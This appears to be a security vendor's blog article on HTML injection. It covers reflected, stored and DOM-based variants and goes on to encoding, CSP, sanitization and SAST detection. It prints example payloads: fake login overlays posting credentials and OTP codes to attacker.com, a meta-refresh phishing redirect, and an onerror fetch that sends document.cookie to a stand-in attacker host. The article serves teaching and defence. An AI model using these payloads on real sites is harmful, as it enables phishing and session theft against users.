HTML injection is a vulnerability that occurs when an attacker can insert arbitrary HTML markup into a web page viewed by other users. While often overshadowed by its sibling — Cross-Site Scripting (XSS) — HTML injection is a distinct and exploitable vulnerability class that can lead to credential theft, phishing attacks, and defacement even when JavaScript execution is blocked.
What Is HTML Injection?
HTML injection happens when user-supplied input is rendered directly into a page’s HTML without proper encoding, allowing an attacker to control the page’s structure. Unlike XSS, HTML injection does not necessarily involve JavaScript — the attacker injects HTML elements like forms, images, links, or <meta> tags.
Example of the vulnerability:
A page greets users by reflecting the name query parameter:
https://example.com/welcome?name=Alice
Rendered HTML:
<p>Welcome, Alice!</p>
If the application doesn’t encode the input, an attacker can inject:
https://example.com/welcome?name=<h1>Hacked</h1><a+href="https://evil.com">Click+here+to+verify+your+account</a>
Rendered HTML:
<p>Welcome, <h1>Hacked</h1><a href="https://evil.com">Click here to verify your account</a>!</p>
The attacker has inserted a link pointing to a phishing site, and it looks like part of the legitimate application.
HTML Injection vs. Cross-Site Scripting (XSS)
HTML injection and XSS are closely related — XSS is essentially HTML injection where the injected content includes executable JavaScript. The distinction matters for exploitation and detection:
| HTML Injection | Cross-Site Scripting (XSS) | |
|---|---|---|
| Injected content | HTML elements (forms, links, images) | JavaScript + HTML |
| JavaScript required | No | Yes |
| Impact | Phishing, defacement, credential theft | Everything HTML injection can do + session theft, RCE via DOM |
| Bypasses CSP? | Sometimes — <form> and <img> tags may work without script-src | Blocked by strict CSP |
| CWE reference | CWE-80 | CWE-79 |
HTML injection is particularly dangerous in environments where Content Security Policy (CSP) blocks JavaScript execution. An attacker blocked from injecting <script> tags can still inject <form> tags to harvest credentials, or <img> tags to perform cross-site request actions.
Types of HTML Injection
1. Reflected HTML Injection
The injected HTML is returned in the server’s immediate response to a crafted request. This is the most common form and is often delivered via phishing links.
Scenario:
A search page reflects the search query:
GET /search?q=<b>IMPORTANT+NOTICE:+Your+account+has+been+suspended
The server renders:
<div class="results">
You searched for: <b>IMPORTANT NOTICE: Your account has been suspended
</div>
The victim sees bold text claiming their account is suspended — injected entirely through the URL.
2. Stored (Persistent) HTML Injection
The payload is stored in the application’s database and rendered to all users who view the affected content. This is significantly more dangerous because it doesn’t require sending individual phishing links.
Scenario:
A forum application stores post content without sanitization:
<!-- Attacker's post content -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999">
<h2>Your session has expired. Please log in again.</h2>
<form action="https://attacker.com/harvest">
Username: <input name="user"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Log In">
</form>
</div>
Every user who views that post sees a fake login form overlaid on the legitimate page. Credentials entered go directly to the attacker’s server.
3. DOM-Based HTML Injection
The injection occurs entirely in the browser through client-side JavaScript that writes user-controlled data to the DOM without proper encoding.
// VULNERABLE: writes URL fragment directly to the page
document.getElementById('greeting').innerHTML =
'Welcome, ' + location.hash.substring(1);
An attacker links to:
https://app.example.com/profile#<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>
The innerHTML assignment interprets the injected HTML including the onerror handler.
Real-World HTML Injection Attack Scenarios
Scenario 1: Credential Phishing via Form Injection
The most impactful HTML injection attack injects a fake login form into a trusted domain. Because the form is rendered on the legitimate domain (example-bank.com), users have no visual indication it is malicious.
<!-- Injected into a bank's search results page -->
<style>
body > *:not(#phish-overlay) { display: none !important; }
</style>
<div id="phish-overlay" style="padding:40px;font-family:Arial">
<img src="/assets/logo.png" alt="Bank Logo">
<h3>Security Alert: Please verify your identity</h3>
<form method="POST" action="https://attacker.com/steal">
<label>Username: <input type="text" name="username"></label><br><br>
<label>Password: <input type="password" name="password"></label><br><br>
<label>One-Time Code: <input type="text" name="otp"></label><br><br>
<button type="submit">Verify</button>
</form>
</div>
The injected CSS hides the legitimate page content and the injected form harvests credentials including OTP codes.
Scenario 2: Open Redirect via Meta Refresh
<!-- Injected HTML causes an automatic redirect -->
<meta http-equiv="refresh" content="3;url=https://phishing-site.com">
<p>Please wait while we redirect you to the secure login portal...</p>
Scenario 3: Content Spoofing for Misinformation
On a news or information site:
<!-- Injected into a news article comment -->
<blockquote style="font-size:1.4em;font-weight:bold;border-left:4px solid red;padding:10px">
BREAKING: This website has been compromised. Do not enter any personal information.
Call our security hotline: +1-555-ATTACKER
</blockquote>
Prevention: How to Stop HTML Injection
1. Output Encoding — The Primary Defense
The fundamental fix is encoding all user-supplied data before rendering it as HTML. Output encoding converts HTML special characters to their entity equivalents, preventing them from being interpreted as markup:
| Character | HTML Entity |
|---|---|
< | < |
> | > |
" | " |
' | ' |
& | & |
Java (OWASP Java Encoder):
import org.owasp.encoder.Encode;
// VULNERABLE
out.println("<p>Welcome, " + username + "!</p>");
// SECURE: HTML-encode all user data before inserting into HTML context
out.println("<p>Welcome, " + Encode.forHtml(username) + "!</p>");
Python (Django):
# Django templates auto-escape by default
{{ username }} {# Safe — Django encodes this #}
# Bypassing escaping is explicit and dangerous:
{{ username | safe }} # ← Only if you've already sanitized the value
JavaScript (DOM methods):
// VULNERABLE: innerHTML parses HTML, enables injection
document.getElementById('name').innerHTML = userInput;
// SECURE: textContent treats input as literal text — no HTML parsing
document.getElementById('name').textContent = userInput;
Node.js (he library):
const he = require('he');
// SECURE: HTML-encode user input before embedding in HTML strings
const safe = he.encode(userInput);
res.send(`<p>Welcome, ${safe}!</p>`);
2. Use Template Engines with Auto-Escaping
Modern template engines escape variables by default. Use them — and never use “raw/unescaped” output for untrusted data:
{# Jinja2 (Python) — auto-escaped by default #}
<p>Welcome, {{ username }}!</p>
{# Bypassing is explicit — only do this for trusted, pre-sanitized HTML #}
<div>{{ body | safe }}</div>
{{! Handlebars — auto-escaped }}
<p>Welcome, {{username}}!</p>
{{! Triple braces = unescaped — ONLY for trusted content }}
<div>{{{trustedContent}}}</div>
3. Input Validation
Validate that input matches the expected format and reject or sanitize values that don’t. For fields like names or usernames, use an allowlist approach:
import re
def validate_username(username):
# Only allow alphanumeric, underscore, hyphen — no HTML special chars
if not re.match(r'^[a-zA-Z0-9_-]{3,30}$', username):
raise ValueError("Username contains invalid characters")
return username
Note: Input validation is a defense-in-depth measure, not a replacement for output encoding. Encoding at the point of output is the primary control.
4. Content Security Policy (CSP)
A strong CSP can limit the impact of HTML injection by restricting what injected HTML can do:
Content-Security-Policy:
default-src 'self';
script-src 'self' 'nonce-{random}';
form-action 'self';
base-uri 'self';
Key directives for limiting HTML injection impact:
form-action 'self'— prevents injected forms from submitting to external URLsbase-uri 'self'— prevents<base>tag injection that changes relative URL resolutionframe-ancestors 'none'— prevents your page from being framed (limits overlay attacks)
CSP does not fix the underlying HTML injection vulnerability — it reduces the impact. Encoding is still required.
5. Sanitization for Rich Text Content
When you genuinely need to allow users to submit some HTML (e.g., a WYSIWYG editor for blog posts), use a trusted HTML sanitization library rather than writing your own:
// Node.js — DOMPurify (client-side) or sanitize-html (server-side)
const sanitizeHtml = require('sanitize-html');
const clean = sanitizeHtml(userHtml, {
allowedTags: ['b', 'i', 'em', 'strong', 'a', 'p', 'ul', 'li'],
allowedAttributes: {
'a': ['href'], // Only allow href — not onclick, onmouseover, etc.
},
allowedSchemes: ['http', 'https', 'mailto'], // No javascript: URIs
});
# Python — bleach
import bleach
clean = bleach.clean(
user_html,
tags=['b', 'i', 'em', 'strong', 'a', 'p'],
attributes={'a': ['href']},
strip=True,
)
How SAST Tools Detect HTML Injection
A Static Application Security Testing (SAST) tool detects HTML injection through taint analysis — tracing untrusted data from its source (HTTP request parameters, headers, form fields) to HTML output sinks (template render calls, innerHTML, document.write, Response.Write, etc.) without passing through an encoding function.
The detection logic tracks:
- Source identification —
request.GET['name'],req.body.username,$_GET['q'], etc. - Sink identification —
innerHTML =,document.write(),Response.Write(), template output without escaping - Sanitizer recognition —
Encode.forHtml(),he.encode(),escape(), template auto-escaping - Taint propagation — following the data through function calls, string concatenations, and variable assignments
Offensive360’s SAST engine performs this inter-procedural taint analysis across all 60+ supported languages, flagging both reflected and stored HTML injection patterns. Findings include the full data-flow trace from source to sink, a severity rating, CWE-80 mapping, and a recommended fix with a code example.
HTML Injection vs. OWASP Top 10
HTML injection maps directly to OWASP A03:2021 — Injection and OWASP A03:2021 — XSS (which is a subtype of injection). More specifically:
- CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) — covers cases where HTML injection can lead to script execution
- CWE-116: Improper Encoding or Escaping of Output — the root cause of most HTML injection
It also appears in the OWASP Web Security Testing Guide under WSTG-INPVAL-03: Testing for HTML Injection.
Summary
HTML injection is a high-impact vulnerability class that enables phishing, credential theft, and page defacement on legitimate domains. The fix is straightforward — encode all user-supplied data before inserting it into HTML contexts — but the vulnerability appears repeatedly in production applications where one output context is overlooked.
The defense hierarchy:
- Output encode all user data at the point of rendering (primary control)
- Use auto-escaping template engines and avoid bypassing escaping
- Validate input format for fields that don’t need HTML characters
- Apply CSP to limit impact if encoding is missed
- Sanitize with an allowlist library only when HTML input is genuinely required
Running a SAST scan with taint analysis on your codebase will identify every location where user-controlled data reaches an HTML output sink without encoding — the exact pattern that enables HTML injection attacks.
Offensive360 SAST detects HTML injection and XSS across 60+ languages with full taint analysis. Run a one-time scan for $500 or book a demo to see the full platform.